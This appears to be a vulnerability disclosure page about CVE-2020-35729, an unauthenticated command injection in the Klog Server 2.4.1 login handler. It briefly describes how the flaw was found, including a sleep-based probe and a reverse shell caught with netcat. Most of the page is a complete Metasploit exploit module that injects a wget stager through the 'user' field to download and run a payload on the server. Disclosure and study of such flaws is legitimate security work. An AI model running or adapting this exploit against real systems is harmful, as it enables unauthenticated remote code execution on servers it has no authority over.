UNSAFE-INLINE
Search…
KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
As you can see in the code line above , the user input received without any filtering in the login panel is running on the server.The purpose of code line is fail login user save on ‘log.sh’ file found in the path /klog/www/config/scripts/ .Shown below see log.sh source codes.
Where ‘logmsg’ variable holds the user value in here and Var / log / klog / 127.0.0.1 / kaudit.log file is saved as in the code. This situation cause be command injection vulnerability.

VULNERABILITY DETECTION AND EXPLOTATION

In the first step “%26sleep+5%26” payload’s has been sent and it is provided to run on target klog server .This situation Burpsuite is shown below in the screenshot.
Then, in order to automate the reverse shell connection on the server, the exploit shown in the screenshot below, was run and the shell operation was successfully performed in the listening NC connection.
Klog Server 2.4.1 - Command Injection (Unauthenticated)
Exploit Database
1
##
2
# This module requires Metasploit: http://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
include Msf::Exploit::Remote::HttpClient
9
include Msf::Exploit::CmdStager
10
11
def initialize(info={})
12
super(update_info(info,
13
'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
14
'Description' => %q{
15
This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
16
"user" parameter is executed via shell_exec() function without input validation.
17
},
18
'License' => MSF_LICENSE,
19
'Author' =>
20
[ 'B3KC4T', # Vulnerability discovery
21
'Metin Yunus Kandemir', # Metasploit module
22
],
23
'References' =>
24
[
25
['CVE', '2020-35729'],
26
['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
27
],
28
29
'DefaultOptions' =>
30
{
31
'HttpClientTimeout' => 2,
32
},
33
'Platform' => [ 'unix', 'linux' ],
34
'Arch' => [ ARCH_X64 ],
35
'Targets' => [
36
['Klog Server 2.4.1 (x64)', {
37
'Platform' => 'linux',
38
'Arch' => ARCH_X64,
39
}],
40
],
41
'Privileged' => false,
42
'DisclosureDate' => "2021-01-05",
43
'DefaultTarget' => 0))
44
register_options(
45
[
46
Opt::RPORT(443),
47
OptBool.new('SSL', [true, 'Use SSL', true]),
48
OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
49
]
50
)
51
end
52
53
def filter_bad_chars(cmd)
54
cmd.gsub!(/chmod \+x/, 'chmod 777')
55
cmd.gsub!(/;/, " %0A ")
56
cmd.gsub!(/ /, '+')
57
cmd.gsub!(/\//, '%2F')
58
59
end
60
61
def execute_command(cmd, opts = {})
62
command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
63
64
print_status("Sending stager payload...")
65
uri = target_uri.path
66
res= send_request_cgi({
67
'method' => 'POST',
68
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
69
'encode_params' => false,
70
'vars_post' => {
71
'user' => command_payload,
72
'pswd' => "inline"
73
}
74
})
75
if res && res.code == 302
76
print_error("The target is not vulnerable!")
77
else
78
print_good("The target is vulnerable!")
79
end
80
end
81
82
def check
83
uri = target_uri.path
84
res= send_request_cgi({
85
'method' => 'POST',
86
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
87
'encode_params' => false,
88
'vars_post' => {
89
'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
90
'pswd' => "inline"
91
}
92
})
93
if res && res.code == 302
94
return Exploit::CheckCode::Safe
95
else
96
return Exploit::CheckCode::Vulnerable
97
end
98
end
99
100
def exploit
101
print_status("Exploiting...")
102
execute_cmdstager(flavor: :wget, delay: 10)
103
end
104
end
105
Copied!
Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)
Exploit Database
Last modified 9mo ago